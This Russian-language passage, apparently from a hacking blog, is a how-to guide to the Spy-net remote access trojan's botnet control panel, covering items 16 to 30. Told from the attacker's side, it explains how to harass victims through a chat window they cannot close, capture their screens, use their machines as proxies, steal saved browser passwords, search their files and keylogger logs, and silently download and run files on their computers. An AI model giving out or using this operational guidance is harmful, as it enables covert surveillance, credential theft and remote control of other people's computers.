Посылает сообщения через аккаунты MSN жертв.

Ботнет

16. «CHAT»

Функция позволяет вести диалог с нашей жертвой, через открывшееся чат-окно. Думаю данная функция понадобится только из цели поглумится.

Ботнет

Для начала нам необходимо задать характеристики чата.

Chat Windows title — заглавие окна чата;
Server name — ник жертвы;
Client name — ваш ник.

После того как окончили с опциями оправляем жертве сообщение и на десктопе жертвы возникает окно чатом которое она не сумеет закрыть. Так же можно вести диалог сходу с несколькими жертвами.

17.«Desktop image»

При помощи данной функции можно сделать снимок экрана десктопа жертвы и он
появится в правом верхнем окне клиента Spy-net.

18.«HTTP proxy»

Очень нужная функция. С её помощью можно сделать из жертвы прокси сервер.
Т.е мы будем посиживать через IP нашей жертвы. Избираем данную функцию, прописываем порт, жмём «start» и пользуемся.

Ботнет

19. «Passwords»

Эта функция отвечает за сбора сохранённых паролей с браузеров жертвы. Но большой минус, что эта функция работает только с браузером IE и старенькыми версиями Оперы и Мазилы.

20. «Search…»

Данная функция нужна для поиска подходящих файлов на компьютере жертвы либо
поиск слов в кейлоггере. Избираем какой из вариантов поиска нам нужен и вводим слово которое нам необходимо отыскать, более 3 знаков. Жмём ОК и возникает окно со перечнем жертв у каких имеется данный файл либо слово в логах.

21. «Download and execute file»

Эта функция позволить скачать из сети и запустить файлы на компютере жертвы. Расширение может быть хоть каким.

Ботнет

В окошечке вводим прямую ссылку на подходящий нам файл, жмем «OK». Дальше он
предложит, запустить ли файл в сокрытом режиме. Избираем «Yes».

22. «Open WEB-page»

Данная функция может открыть всякую интернет-страницу с компьютера жертвы. Просто вводим ссылку куда необходимо перейти, жмём «ОК» и страничка раскрывается в браузере, который стоит по дефлоту у нашего бота.

Ботнет

23. «Run command»

Функция позволяет запустить приложение с дополнительным параметром. Аналогично команде «Выполнить» в Пуске.

Ботнет

24. «Send file and…»

Данная функция позволяет выслать нашим ботам хоть какой файл, который находится на
нашем ПК и запустить его в сокрытом режиме либо в обыкновенном.

25. «Update server»

Функция обновления сервера.

Есть 2 метода:

From local file — берем новый файл сервера со собственного компютера, на котором находиться
клиент;

From URL — с сервера в вебе. Линк, должен быть прямой на новый сервер;
Таким макаром если появилась потребность внести конфигурации в сервер (обменялся адресок
либо порты) то обновить его можно таким макаром.

26. «Ping»

Функция позволяет пропинговать наших роботов, т.е проверить скорость соединения.
Качество соединения можно найти по цвету квадратикам в поле «identification».
Если связь отменная, квадратик — зелёный.
Если нехорошая, квадратик – красноватый.
Если связи нету, квадратик – белоснежный.
Всё разумно )

27. «Recconect to adress…»

Функция позволит перенаправить наших жертв на другой адресок либо порт.

28. «Disconnect»
Прерывает связь с жертвой, при перезапуске жертва опять будет в перечне.

29. «Uninstall»
Стопроцентно уничтожает наш троян на компьютере жертвы.

30. «Rename»
Функция позволяет поменять имя и идентификатор нашего сервера.

Софт

Добавить комментарий

Ваш e-mail не будет опубликован. Обязательные поля помечены *